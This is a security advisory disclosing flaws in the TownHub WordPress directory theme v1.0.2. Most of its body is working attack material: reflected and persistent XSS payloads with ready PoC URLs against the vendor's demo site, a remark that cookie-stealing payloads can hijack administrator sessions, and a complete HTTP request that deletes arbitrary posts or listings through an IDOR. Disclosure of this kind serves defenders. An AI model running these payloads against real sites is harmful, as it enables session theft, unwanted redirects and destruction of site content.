TownHub - Directory & Listing WordPress Theme v1.0.2 Multiple Vulnerabilities

2019.12.27
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

----[]- Reflected XSS: -[]---- Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Same thing with a regular search (block near website logo). Payload Sample #0: <img src=x onerror=alert(document.cookie)> Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;> PoC #0: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D= PoC #1: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D= ----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://townhub.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0: <img src=x onerror=alert(`m0ze`)> Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;> ----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://townhub.cththemes.com/submit-listing/#/ (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Address», «Latitude (Drag marker on the map)», «Longitude (Drag marker on the map)», «Email Address», «Phone Number» and «Website». Payload inside «Address», «Latitude (Drag marker on the map)» and «Longitude (Drag marker on the map)» input fields also works on the admin dashboard, so it's possible to steal administrator cookies. Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: "><h1>Greetings from m0ze</h1> Payload Sample #2: "><script>alert(`PoC`);</script> ----[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: townhub.cththemes.com User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 83 Origin: https://townhub.cththemes.com DNT: 1 Connection: close Referer: https://townhub.cththemes.com/dashboard/?dashboard=listings Cookie: _your_cookies_here_ Pragma: no-cache Cache-Control: no-cache lid=XXXX&action=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8 Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top